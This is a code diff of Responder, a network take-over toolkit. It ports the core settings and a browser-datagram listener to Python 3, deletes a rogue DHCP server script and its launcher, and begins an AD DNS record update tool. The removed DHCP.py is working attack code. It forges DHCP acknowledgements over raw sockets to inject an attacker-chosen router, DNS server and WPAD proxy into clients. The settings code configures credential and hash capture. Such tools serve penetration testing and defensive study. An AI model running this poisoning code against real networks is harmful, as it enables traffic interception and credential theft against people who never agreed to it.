+		self.DomainName        = self.Domain + '.LOCAL'
+		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
+		self.RPCPort           = random.randrange(45000, 49999)
 		# Auto Ignore List
-		self.AutoIgnore                 = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
-		self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-		self.AutoIgnoreList             = []
-
-		# CLI options
-		self.LM_On_Off          = options.LM_On_Off
-		self.WPAD_On_Off        = options.WPAD_On_Off
-		self.Wredirect          = options.Wredirect
-		self.NBTNSDomain        = options.NBTNSDomain
-		self.Basic              = options.Basic
-		self.Finger_On_Off      = options.Finger
-		self.Interface          = options.Interface
-		self.OURIP              = options.OURIP
-		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
-		self.Upstream_Proxy     = options.Upstream_Proxy
-		self.AnalyzeMode        = options.Analyze
-		self.Verbose            = options.Verbose
-		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
-		self.CommandLine        = str(sys.argv)
-
-		if self.HtmlToInject is None:
-			self.HtmlToInject = ''
-
-		self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
-
-		self.IP_aton         = socket.inet_aton(self.Bind_To)
-		self.Os_version      = sys.platform
+		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
+		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+		self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
+		self.AutoIgnoreList                   = []
 
 		# Set up Challenge
 		self.NumChal = config.get('Responder Core', 'Challenge')
+		if self.NumChal.lower() == 'random':
+			self.NumChal = "random"
 
-		if len(self.NumChal) is not 16:
-			print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
+		if len(self.NumChal) != 16 and self.NumChal != "random":
+			print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1))
 			sys.exit(-1)
 
-		self.Challenge = ""
-		for i in range(0, len(self.NumChal),2):
-			self.Challenge += self.NumChal[i:i+2].decode("hex")
+		self.Challenge = b''
+		if self.NumChal.lower() == 'random':
+			pass
+		else:
+			if self.PY2OR3 == 'PY2':
+				for i in range(0, len(self.NumChal),2):
+					self.Challenge += self.NumChal[i:i+2].decode("hex")
+			else:
+					self.Challenge = bytes.fromhex(self.NumChal)
+
 
 		# Set up logging
 		logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 		logging.warning('Responder Started: %s' % self.CommandLine)
 
 		Formatter = logging.Formatter('%(asctime)s - %(message)s')
-                CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
 		PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
 		ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
-                CLog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setLevel(logging.INFO)
 		ALog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setFormatter(Formatter)
 		ALog_Handler.setFormatter(Formatter)
 
-		self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
-		self.ResponderConfigLogger.addHandler(CLog_Handler)
-
 		self.PoisonersLogger = logging.getLogger('Poisoners Log')
 		self.PoisonersLogger.addHandler(PLog_Handler)
 
 		self.AnalyzeLogger = logging.getLogger('Analyze Log')
 		self.AnalyzeLogger.addHandler(ALog_Handler)
-                
-                NetworkCard = subprocess.check_output(["ifconfig", "-a"])
-                DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
-                RoutingInfo = subprocess.check_output(["netstat", "-rn"])
-                Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
-                self.ResponderConfigLogger.warning(Message)
-                self.ResponderConfigLogger.warning(str(self))
+		
+		# First time Responder run?
+		if os.path.isfile(self.ResponderPATH+'/Responder.db'):
+			pass
+		else:
+			#If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null
+			Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1")
+		
+		try:
+			NetworkCard = subprocess.check_output(["ifconfig", "-a"])
+		except:
+			try:
+				NetworkCard = subprocess.check_output(["ip", "address", "show"])
+			except subprocess.CalledProcessError as ex:
+				NetworkCard = "Error fetching Network Interfaces:", ex
+				pass
+		try:
+			p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+			DNS = p.stdout.read()
+		except:
+			p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+			DNS = p.stdout.read()
+
+		try:
+			RoutingInfo = subprocess.check_output(["netstat", "-rn"])
+		except:
+			try:
+				RoutingInfo = subprocess.check_output(["ip", "route", "show"])
+			except subprocess.CalledProcessError as ex:
+				RoutingInfo = "Error fetching Routing information:", ex
+				pass
+
+		Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1'))
+		try:
+			utils.DumpConfig(self.ResponderConfigDump, Message)
+			#utils.DumpConfig(self.ResponderConfigDump,str(self))
+		except AttributeError as ex:
+			print("Missing Module:", ex)
+			pass
 
 def init():
 	global Config

tools/BrowserListener.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,103 +16,103 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import sys
 import os
-import thread
+import _thread
 
 BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
 sys.path.insert(0, BASEDIR)
 
 from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger
-from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler
 from threading import Lock
 from utils import *
 
 def ParseRoles(data):
-	if len(data) != 4:
-		return ''
+    if len(data) != 4:
+        return ''
 
-	AllRoles = {
-		'Workstation':           (ord(data[0]) >> 0) & 1,
-		'Server':                (ord(data[0]) >> 1) & 1,
-		'SQL':                   (ord(data[0]) >> 2) & 1,
-		'Domain Controller':     (ord(data[0]) >> 3) & 1,
-		'Backup Controller':     (ord(data[0]) >> 4) & 1,
-		'Time Source':           (ord(data[0]) >> 5) & 1,
-		'Apple':                 (ord(data[0]) >> 6) & 1,
-		'Novell':                (ord(data[0]) >> 7) & 1,
-		'Member':                (ord(data[1]) >> 0) & 1,
-		'Print':                 (ord(data[1]) >> 1) & 1,
-		'Dialin':                (ord(data[1]) >> 2) & 1,
-		'Xenix':                 (ord(data[1]) >> 3) & 1,
-		'NT Workstation':        (ord(data[1]) >> 4) & 1,
-		'WfW':                   (ord(data[1]) >> 5) & 1,
-		'Unused':                (ord(data[1]) >> 6) & 1,
-		'NT Server':             (ord(data[1]) >> 7) & 1,
-		'Potential Browser':     (ord(data[2]) >> 0) & 1,
-		'Backup Browser':        (ord(data[2]) >> 1) & 1,
-		'Master Browser':        (ord(data[2]) >> 2) & 1,
-		'Domain Master Browser': (ord(data[2]) >> 3) & 1,
-		'OSF':                   (ord(data[2]) >> 4) & 1,
-		'VMS':                   (ord(data[2]) >> 5) & 1,
-		'Windows 95+':           (ord(data[2]) >> 6) & 1,
-		'DFS':                   (ord(data[2]) >> 7) & 1,
-		'Local':                 (ord(data[3]) >> 6) & 1,
-		'Domain Enum':           (ord(data[3]) >> 7) & 1,
-	}
+    AllRoles = {
+            'Workstation':           (ord(data[0]) >> 0) & 1,
+            'Server':                (ord(data[0]) >> 1) & 1,
+            'SQL':                   (ord(data[0]) >> 2) & 1,
+            'Domain Controller':     (ord(data[0]) >> 3) & 1,
+            'Backup Controller':     (ord(data[0]) >> 4) & 1,
+            'Time Source':           (ord(data[0]) >> 5) & 1,
+            'Apple':                 (ord(data[0]) >> 6) & 1,
+            'Novell':                (ord(data[0]) >> 7) & 1,
+            'Member':                (ord(data[1]) >> 0) & 1,
+            'Print':                 (ord(data[1]) >> 1) & 1,
+            'Dialin':                (ord(data[1]) >> 2) & 1,
+            'Xenix':                 (ord(data[1]) >> 3) & 1,
+            'NT Workstation':        (ord(data[1]) >> 4) & 1,
+            'WfW':                   (ord(data[1]) >> 5) & 1,
+            'Unused':                (ord(data[1]) >> 6) & 1,
+            'NT Server':             (ord(data[1]) >> 7) & 1,
+            'Potential Browser':     (ord(data[2]) >> 0) & 1,
+            'Backup Browser':        (ord(data[2]) >> 1) & 1,
+            'Master Browser':        (ord(data[2]) >> 2) & 1,
+            'Domain Master Browser': (ord(data[2]) >> 3) & 1,
+            'OSF':                   (ord(data[2]) >> 4) & 1,
+            'VMS':                   (ord(data[2]) >> 5) & 1,
+            'Windows 95+':           (ord(data[2]) >> 6) & 1,
+            'DFS':                   (ord(data[2]) >> 7) & 1,
+            'Local':                 (ord(data[3]) >> 6) & 1,
+            'Domain Enum':           (ord(data[3]) >> 7) & 1,
+    }
 
-	return ', '.join(k for k,v in AllRoles.items() if v == 1)
+    return ', '.join(k for k,v in list(AllRoles.items()) if v == 1)
 
 
 class BrowserListener(BaseRequestHandler):
-	def handle(self):
-		data, socket = self.request
+    def handle(self):
+        data, socket = self.request
 
-		lock = Lock()
-		lock.acquire()
+        lock = Lock()
+        lock.acquire()
 
-		DataOffset    = struct.unpack('<H',data[139:141])[0]
-		BrowserPacket = data[82+DataOffset:]
-		ReqType       = RequestType(BrowserPacket[0])
+        DataOffset    = struct.unpack('<H',data[139:141])[0]
+        BrowserPacket = data[82+DataOffset:]
+        ReqType       = RequestType(BrowserPacket[0])
 
-		Domain = Decode_Name(data[49:81])
-		Name   = Decode_Name(data[15:47])
-		Role1  = NBT_NS_Role(data[45:48])
-		Role2  = NBT_NS_Role(data[79:82])
-		Fprint = WorkstationFingerPrint(data[190:192])
-		Roles  = ParseRoles(data[192:196])
+        Domain = Decode_Name(data[49:81])
+        Name   = Decode_Name(data[15:47])
+        Role1  = NBT_NS_Role(data[45:48])
+        Role2  = NBT_NS_Role(data[79:82])
+        Fprint = WorkstationFingerPrint(data[190:192])
+        Roles  = ParseRoles(data[192:196])
 
-		print text("[BROWSER] Request Type : %s" % ReqType)
-		print text("[BROWSER] Address      : %s" % self.client_address[0])
-		print text("[BROWSER] Domain       : %s" % Domain)
-		print text("[BROWSER] Name         : %s" % Name)
-		print text("[BROWSER] Main Role    : %s" % Role1)
-		print text("[BROWSER] 2nd Role     : %s" % Role2)
-		print text("[BROWSER] Fingerprint  : %s" % Fprint)
-		print text("[BROWSER] Role List    : %s" % Roles)
+        print(text("[BROWSER] Request Type : %s" % ReqType))
+        print(text("[BROWSER] Address      : %s" % self.client_address[0]))
+        print(text("[BROWSER] Domain       : %s" % Domain))
+        print(text("[BROWSER] Name         : %s" % Name))
+        print(text("[BROWSER] Main Role    : %s" % Role1))
+        print(text("[BROWSER] 2nd Role     : %s" % Role2))
+        print(text("[BROWSER] Fingerprint  : %s" % Fprint))
+        print(text("[BROWSER] Role List    : %s" % Roles))
 
-		RAPThisDomain(self.client_address[0], Domain)
+        RAPThisDomain(self.client_address[0], Domain)
 
-		lock.release()
+        lock.release()
 
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
-	def server_bind(self):
-		self.allow_reuse_address = 1
-		UDPServer.server_bind(self)
+    def server_bind(self):
+        self.allow_reuse_address = 1
+        UDPServer.server_bind(self)
 
 def serve_thread_udp_broadcast(host, port, handler):
-	try:
-		server = ThreadingUDPServer(('', port), handler)
-		server.serve_forever()
-	except:
-		print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+    try:
+        server = ThreadingUDPServer(('', port), handler)
+        server.serve_forever()
+    except:
+        print("Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 if __name__ == "__main__":
-	try:
-		print "Listening for BROWSER datagrams..."
-		thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
+    try:
+        print("Listening for BROWSER datagrams...")
+        _thread.start_new(serve_thread_udp_broadcast,('', 138,  BrowserListener))
 
-		while True:
-			time.sleep(1)
+        while True:
+            time.sleep(1)
 
-	except KeyboardInterrupt:
-		sys.exit("\r Exiting...")
+    except KeyboardInterrupt:
+        sys.exit("\r Exiting...")

tools/DHCP.py

@@ -1,318 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import struct
-import optparse
-import ConfigParser
-import os
-
-BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
-sys.path.insert(0, BASEDIR)
-from odict import OrderedDict
-from packets import Packet
-from utils import *
-
-parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
-parser.add_option('-I', '--interface',  action="store",      help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
-parser.add_option('-d', '--dnsname',    action="store",      help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
-parser.add_option('-r', '--router',     action="store",      help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
-parser.add_option('-p', '--primary',    action="store",      help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
-parser.add_option('-s', '--secondary',  action="store",      help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
-parser.add_option('-n', '--netmask',    action="store",      help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
-parser.add_option('-w', '--wpadserver', action="store",      help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
-parser.add_option('-S',                 action="store_true", help="Spoof the router ip address",dest="Spoof")
-parser.add_option('-R',                 action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
-options, args = parser.parse_args()
-
-def color(txt, code = 1, modifier = 0):
-	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
-
-if options.Interface is None:
-	print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
-	exit(-1)
-elif options.RouterIP is None:
-	print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
-	exit(-1)
-elif options.DNSIP is None:
-	print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
-	exit(-1)
-elif options.DNSIP2 is None:
-	print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
-	exit(-1)
-
-
-print '#############################################################################'
-print '##                       DHCP INFORM TAKEOVER 0.2                          ##'
-print '##                                                                         ##'
-print '##        By default, this script will only inject a new DNS/WPAD          ##'
-print '##                server to a Windows <= XP/2003 machine.                  ##'
-print '##                                                                         ##'
-print '##     To inject a DNS server/domain/route on a Windows >= Vista and       ##'
-print '##               any linux box, use -R (can be noisy)                      ##'
-print '##                                                                         ##'
-print '##   Use `RespondTo` setting in Responder.conf for in-scope targets only.  ##'
-print '#############################################################################'
-print ''
-print color('[*]', 2, 1), 'Listening for events...'
-
-config = ConfigParser.ConfigParser()
-config.read(os.path.join(BASEDIR,'Responder.conf'))
-RespondTo           = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-DontRespondTo       = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-Interface           = options.Interface
-Responder_IP        = FindLocalIP(Interface)
-ROUTERIP            = options.RouterIP
-NETMASK             = options.Netmask
-DHCPSERVER          = Responder_IP
-DNSIP               = options.DNSIP
-DNSIP2              = options.DNSIP2
-DNSNAME             = options.DNSNAME
-WPADSRV             = options.WPAD.strip() + "\\n"
-Spoof               = options.Spoof
-Respond_To_Requests = options.Respond_To_Requests
-
-if Spoof:
-	DHCPSERVER = ROUTERIP
-
-##### IP Header #####
-class IPHead(Packet):
-	fields = OrderedDict([
-		("Version",           "\x45"),
-		("DiffServices",      "\x00"),
-		("TotalLen",          "\x00\x00"),
-		("Ident",             "\x00\x00"),
-		("Flags",             "\x00\x00"),
-		("TTL",               "\x40"),
-		("Protocol",          "\x11"),
-		("Checksum",          "\x00\x00"),
-		("SrcIP",             ""),
-		("DstIP",             ""),
-	])
-
-class UDP(Packet):
-	fields = OrderedDict([
-		("SrcPort",           "\x00\x43"),
-		("DstPort",           "\x00\x44"),
-		("Len",               "\x00\x00"),
-		("Checksum",          "\x00\x00"),
-		("Data",              "\x00\x00"),
-	])
-
-	def calculate(self):
-		self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
-
-class DHCPACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("DHCPCode",          "\x35"),              #DHCP Message
-		("DHCPCodeLen",       "\x01"),
-		("DHCPOpCode",        "\x05"),              #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op51",              "\x33"),
-		("Op51Len",           "\x04"),
-		("Op51Str",           "\x00\x01\x51\x80"),  #Lease time, 1 day
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server
-		("Op255",             "\xff"),
-		("Padding",           "\x00"),
-	])
-
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
-
-class DHCPInformACK(Packet):
-	fields = OrderedDict([
-		("MessType",          "\x02"),
-		("HdwType",           "\x01"),
-		("HdwLen",            "\x06"),
-		("Hops",              "\x00"),
-		("Tid",               "\x11\x22\x33\x44"),
-		("ElapsedSec",        "\x00\x00"),
-		("BootpFlags",        "\x00\x00"),
-		("ActualClientIP",    "\x00\x00\x00\x00"),
-		("GiveClientIP",      "\x00\x00\x00\x00"),
-		("NextServerIP",      "\x00\x00\x00\x00"),
-		("RelayAgentIP",      "\x00\x00\x00\x00"),
-		("ClientMac",         "\xff\xff\xff\xff\xff\xff"),
-		("ClientMacPadding",  "\x00" *10),
-		("ServerHostname",    "\x00" * 64),
-		("BootFileName",      "\x00" * 128),
-		("MagicCookie",       "\x63\x82\x53\x63"),
-		("Op53",              "\x35\x01\x05"),      #Msgtype(ACK)
-		("Op54",              "\x36"),
-		("Op54Len",           "\x04"),
-		("Op54Str",           ""),                  #DHCP Server
-		("Op1",               "\x01"),
-		("Op1Len",            "\x04"),
-		("Op1Str",            ""),                  #Netmask
-		("Op15",              "\x0f"),
-		("Op15Len",           "\x0e"),
-		("Op15Str",           ""),                  #DNS Name
-		("Op3",               "\x03"),
-		("Op3Len",            "\x04"),
-		("Op3Str",            ""),                  #Router
-		("Op6",               "\x06"),
-		("Op6Len",            "\x08"),
-		("Op6Str",            ""),                  #DNS Servers
-		("Op252",             "\xfc"),
-		("Op252Len",          "\x04"),
-		("Op252Str",          ""),                  #Wpad Server.
-		("Op255",             "\xff"),
-	])
-
-	def calculate(self):
-		self.fields["Op54Str"]  = socket.inet_aton(DHCPSERVER)
-		self.fields["Op1Str"]   = socket.inet_aton(NETMASK)
-		self.fields["Op3Str"]   = socket.inet_aton(ROUTERIP)
-		self.fields["Op6Str"]   = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
-		self.fields["Op15Str"]  = DNSNAME
-		self.fields["Op252Str"] = WPADSRV
-		self.fields["Op15Len"]  = struct.pack(">b",len(str(self.fields["Op15Str"])))
-		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
-
-def SpoofIP(Spoof):
-	return ROUTERIP if Spoof else Responder_IP
-
-def RespondToThisIP(ClientIp):
-	if ClientIp.startswith('127.0.0.'):
-		return False
-	elif RespondTo and ClientIp not in RespondTo:
-		return False
-	elif ClientIp in RespondTo or RespondTo == []:
-		if ClientIp not in DontRespondTo:
-			return True
-	return False
-
-def ParseSrcDSTAddr(data):
-	SrcIP = socket.inet_ntoa(data[0][26:30])
-	DstIP = socket.inet_ntoa(data[0][30:34])
-	SrcPort = struct.unpack('>H',data[0][34:36])[0]
-	DstPort = struct.unpack('>H',data[0][36:38])[0]
-	return SrcIP, SrcPort, DstIP, DstPort
-
-def FindIP(data):
-	IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
-	return ''.join(IP[0:4])
-
-def ParseDHCPCode(data):
-	PTid        = data[4:8]
-	Seconds     = data[8:10]
-	CurrentIP   = socket.inet_ntoa(data[12:16])
-	RequestedIP = socket.inet_ntoa(data[16:20])
-	MacAddr     = data[28:34]
-	MacAddrStr  = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
-	OpCode      = data[242:243]
-	RequestIP   = data[245:249]
-
-	# DHCP Inform
-	if OpCode == "\x08": 
-		IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
-		Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
-								GiveClientIP=socket.inet_aton("0.0.0.0"),
-								NextServerIP=socket.inet_aton("0.0.0.0"),
-								RelayAgentIP=socket.inet_aton("0.0.0.0"),
-								ElapsedSec=Seconds)
-		Packet.calculate()
-		Buffer = UDP(Data = Packet)
-		Buffer.calculate()
-		SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
-		return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x03" and Respond_To_Requests:  # DHCP Request
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
-				return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-	elif OpCode == "\x01" and Respond_To_Requests:  # DHCP Discover
-		IP = FindIP(data)
-		if IP:
-			IPConv = socket.inet_ntoa(IP)
-			if RespondToThisIP(IPConv):
-				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
-				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
-				Packet.calculate()
-				Buffer = UDP(Data = Packet)
-				Buffer.calculate()
-				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
-				return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
-
-def SendDHCP(packet,Host):
-	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
-	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
-	s.sendto(packet, Host)
-
-if __name__ == "__main__":
-	s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
-	s.bind((Interface, 0x0800))
-
-	while True:
-		try:
-			data = s.recvfrom(65535)
-			if data[0][23:24] == "\x11":  # is udp?
-				SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
-
-				if SrcPort == 67 or DstPort == 67:
-					ret = ParseDHCPCode(data[0][42:])
-					if ret:
-						print text("[DHCP] %s" % ret)
-
-		except KeyboardInterrupt:
-			sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
-

tools/DHCP_Auto.sh

@@ -1,63 +0,0 @@
-#!/bin/bash
-# This file is part of Responder. laurent.gaffie@gmail.com
-#
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
-# This script will try to auto-detect network parameters
-# to run the rogue DHCP server, to inject only your IP
-# address as the primary DNS server and WPAD server and
-# leave everything else normal.
-
-if [ -z $1 ]; then
-	echo "usage: $0 <interface>"
-	exit
-fi
-
-if [ $EUID -ne 0 ]; then
-	echo "Must be run as root."
-	exit
-fi
-
-if [ ! -d "/sys/class/net/$1" ]; then
-	echo "Interface does not exist."
-	exit
-fi
-
-INTF=$1
-PATH="$PATH:/sbin"
-IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'`
-NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'`
-DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'`
-DNS1=$IPADDR
-DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'`
-ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'`
-WPADSTR="http://$IPADDR/wpad.dat"
-if [ -z "$DOMAIN" ]; then
-	DOMAIN="  "
-fi
-
-echo "Running with parameters:"
-echo "INTERFACE: $INTF"
-echo "IP ADDR: $IPADDR"
-echo "NETMAST: $NETMASK"
-echo "ROUTER IP: $ROUTER"
-echo "DNS1 IP: $DNS1"
-echo "DNS2 IP: $DNS2"
-echo "WPAD: $WPADSTR"
-echo ""
-
-
-echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"
-python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"

tools/DNSUpdate.py

@@ -0,0 +1,185 @@
+#!/usr/bin/env python
+
+import sys
+import argparse
+import getpass
+import re
+import socket
+from impacket.structure import Structure
+import ldap3
+import dns.resolver
+from collections import defaultdict
+
+
+class DNS_RECORD(Structure):
+    """
+    dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('DataLength', '<H-Data'),
+        ('Type', '<H'),
+        ('Version', 'B=5'),
+        ('Rank', 'B'),
+        ('Flags', '<H=0'),
+        ('Serial', '<L'),
+        ('TtlSeconds', '>L'),
+        ('Reserved', '<L=0'),
+        ('TimeStamp', '<L=0'),
+        ('Data', ':')
+    )
+
+
+class DNS_RPC_RECORD_A(Structure):
+    """
+    DNS_RPC_RECORD_A [MS-DNSP] section 2.2.2.2.4.1
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('address', ':'),
+    )
+
